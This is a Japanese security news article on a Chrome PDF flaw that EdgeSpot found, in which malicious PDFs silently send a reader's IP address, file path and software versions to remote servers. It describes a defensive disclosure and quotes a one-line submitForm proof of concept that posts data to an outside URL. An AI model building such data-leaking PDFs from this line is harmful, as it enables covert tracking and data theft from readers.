エクスプロイト検出サービスEdgeSpotは、PDFドキュメントを悪用する興味深いChromeゼロデイ脆弱性を発見しました。 この脆弱性により、攻撃者はChromeで開かれた悪意のあるPDFドキュメントを使用して機密データを収集できます。

被害者がそれぞれのPDFファイルをGoogle Chromeで開くとすぐに、悪意のあるプログラムがユーザーデータを収集してバックグラウンドで動作を開始します。

その後、データは、ハッカーによって制御されているリモートサーバーに転送されます。 攻撃者にどのデータが吸い込まれているのか疑問に思うかもしれません。攻撃者はPC上の次のデータを標的にします。

• IPアドレス
• システム上のPDFファイルのフルパス
• OSおよびChromeバージョン

マルウェアに感染したPDFファイルに注意してください

Adobe Readerを使用してPDFファイルを開くと何も起こらないことを知って驚くかもしれません。 さらに、HTTP POST要求は、ユーザーの介入なしにリモートサーバーにデータを転送するために使用されます。

専門家は、2つのドメインのいずれかがreadnotifycomまたはburpcollaboratornetがデータを受信して​​いることを発見しました。

ほとんどのウイルス対策ソフトウェアがEdgeSpotによって検出されたサンプルを検出できないという事実を考慮することで、攻撃の強度を想像できます。

専門家は、攻撃者が「this.submitForm（）」PDF Javascript APIを使用してユーザーの機密情報を収集していることを明らかにしています。

最小限のPoCでテストしました。「this.submitForm（ 'http://google.com/test'）」のような単純なAPI呼び出しにより、Google Chromeは個人データをgoogle.comに送信します。

専門家は、このChromeバグが悪意のあるPDFファイルの2つの異なるセットによって悪用されていることを実際に発見しました。 どちらもそれぞれ2017年10月と2018年9月に配布されました。

特に、収集されたデータは、攻撃者が将来の攻撃を微調整するために使用できます。 レポートは、ファイルの最初のバッチがReadNotifyのPDF追跡サービスを使用してコンパイルされたことを示唆しています。

ユーザーはこのサービスを利用して、ユーザービューを追跡できます。 EdgeSpotは、PDFファイルの2番目のセットの性質に関する詳細を共有していません。

保護されたままにする方法

エクスプロイト検出サービスEdgeSpotは、パッチが近い将来にリリースされる予定がないため、潜在的なリスクについてChromeユーザーに警告したいと考えていました。

EdgeSpotは昨年Googleに脆弱性について報告し、同社は4月下旬にパッチをリリースすることを約束しました。 H

ただし、別のPDFリーダーアプリを使用して受信したPDFドキュメントをローカルで表示することにより、問題に対する一時的な回避策の使用を検討できます。

または、インターネットからシステムを切断して、ChromeでPDFドキュメントを開くこともできます。 その間、4月23日に公開される予定のChrome 74の更新を待つことができます。